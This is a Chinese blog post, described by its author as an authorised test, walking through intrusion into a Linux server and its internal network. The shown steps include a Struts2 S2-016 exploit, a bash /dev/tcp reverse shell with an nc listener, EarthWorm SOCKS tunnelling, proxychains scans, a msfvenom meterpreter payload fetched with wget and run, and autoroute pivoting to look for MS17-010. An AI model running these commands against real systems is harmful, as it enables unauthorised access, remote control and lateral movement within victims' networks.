实用网站TIDE_网络安全

初始内网渗透(二)

2018-10-20  本文已影响404人  CSeroad

前言

在测试某授权网站时发现该系统存在S2-016漏洞。

S2-016

查看文件发现对应不上访问的域名。

选择使用linux反弹shell的方式获取会话。。通过文件上传写入bash语句,执行后来反弹shell。

上传到指定路径并执行。

在自己公网服务器上使用nc开始监听。。

nc

公网IP:nc -lvp 8080

bash反弹:bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1

这样就可以获取一个shell。

发现该系统为linux。只有普通权限。(就不提权啦)

内网渗透

这里使用ew工具进行代理。。

下载地址:

http://rootkiter.com/EarthWorm/

注:下载需要ss

公网IP:  ./ew_linux_x64 -s rcsocks -l 1080 -e 1024

通过访问公网1080端口,将流量转发至1024端口。

shell服务器:./ew_linux_x64 -s rssocks -d  公网IP -e 1024

反弹到公网的1024端口上。

即可代理进入内网。。

注意端口的占用,及时结束linux进程。

可以使用proxifier进行配置为自己公网IP,1080端口。

使用端口扫描器简单扫描一下端口。

端口

看到445端口,检测一下ms17-010

ok

也可以浏览器访问web页面。。

linux系统监控zabbix。。

zabbix

proxychains

也可以使用kali的proxychains工具进行代理访问内网。

cat /etc/proxychains.conf

可进行配置,这里配置为公网IP,1080端口。(和proxifier工具一样配置)

proxychains

就可以使用nmap和msfconsole进行扫描内网啦。。

proxychains nmap -Pn -sT -sV -v -T4  内网IP

proxychains  msfconsole

metasploit

使用msfvenom生成linux木马

msfvenom -p linux/x64/meterpreter/reverse_tcpLHOST=xx.xx.xxx.xxx LPORT=2333 -f elf >/root/sa.elf

将木马放在公网/var/www/html下。使用linux的wget命令进行远程下载并执行。。

sa.elf

在映射到公网的kali下使用msf,进行反弹

msf

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 127.0.0.1

run

meterpreter

可以看到服务器为linux。。

内网渗透

run get_local_subnets    获取当前网段

run  autoroute -s 10.0.1.0/24  添加路由

run autoroute -p    路由查询

使用msf的模块扫描一下网段的ms17-010漏洞。。

ok
上一篇下一篇

猜你喜欢

热点阅读